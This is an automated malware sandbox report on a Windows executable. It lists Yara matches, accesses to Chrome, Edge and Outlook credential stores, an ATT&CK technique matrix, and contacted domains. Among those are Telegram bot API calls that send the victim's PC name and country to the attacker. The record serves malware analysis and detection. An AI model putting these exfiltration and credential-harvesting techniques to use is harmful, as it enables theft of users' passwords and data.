              Source: Yara matchFile source: 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: juvenile.exeBinary or memory string: WIN_81
              Source: juvenile.exeBinary or memory string: WIN_XP
              Source: juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
              Source: juvenile.exeBinary or memory string: WIN_XPe
              Source: juvenile.exeBinary or memory string: WIN_VISTA
              Source: juvenile.exeBinary or memory string: WIN_7
              Source: juvenile.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366ef20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.8100000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTR
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,3_2_004E8C4F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_004E923B
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00928C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00928C4F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0092923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_0092923B
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              2
              Valid Accounts
              3
              Native API
              111
              Scripting
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              4
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts
              2
              Valid Accounts
              31
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder
              21
              Access Token Manipulation
              11
              Software Packing
              NTDS137
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
              Process Injection
              1
              DLL Side-Loading
              LSA Secrets241
              Security Software Discovery
              SSH3
              Clipboard Data
              14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder
              1
              Masquerading
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts
              DCSync3
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
              Virtualization/Sandbox Evasion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
              Process Injection
              Network Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583657 Sample: FACT0987789000900.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 10 other signatures 2->52 8 FACT0987789000900.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\juvenile.exe, PE32 8->26 dropped 60 Binary is likely a compiled AutoIt script file 8->60 14 juvenile.exe 2 8->14         started        62 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->62 18 juvenile.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\juvenile.vbs, data 14->28 dropped 64 Multi AV Scanner detection for dropped file 14->64 66 Binary is likely a compiled AutoIt script file 14->66 68 Machine Learning detection for dropped file 14->68 74 2 other signatures 14->74 20 svchost.exe 15 2 14->20         started        70 Writes to foreign memory regions 18->70 72 Maps a DLL or memory area into another process 18->72 24 svchost.exe 2 18->24         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 49710, 49733, 49740 UTMEMUS United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49806, 49899 TELEGRAMRU United Kingdom 20->38 40 reallyfreegeoip.org 188.114.96.3, 443, 49720, 49727 CLOUDFLARENETUS European Union 20->40 54 System process connects to network (likely due to code injection or exploit) 24->54 56 Tries to steal Mail credentials (via file / registry access) 24->56 58 Tries to harvest and steal browser information (history, passwords, etc) 24->58 signatures12

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              FACT0987789000900.exe71%ReversingLabsWin32.Exploit.Generic
              FACT0987789000900.exe80%VirustotalBrowse
              FACT0987789000900.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\thixolabile\juvenile.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\thixolabile\juvenile.exe71%ReversingLabsWin32.Exploit.Generic
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://reallyfreegeoip.orgch80%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              188.114.96.3
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  132.226.247.73
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        high
                        http://checkip.dyndns.org/false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2014:56:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:16:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20399601%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabsvchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
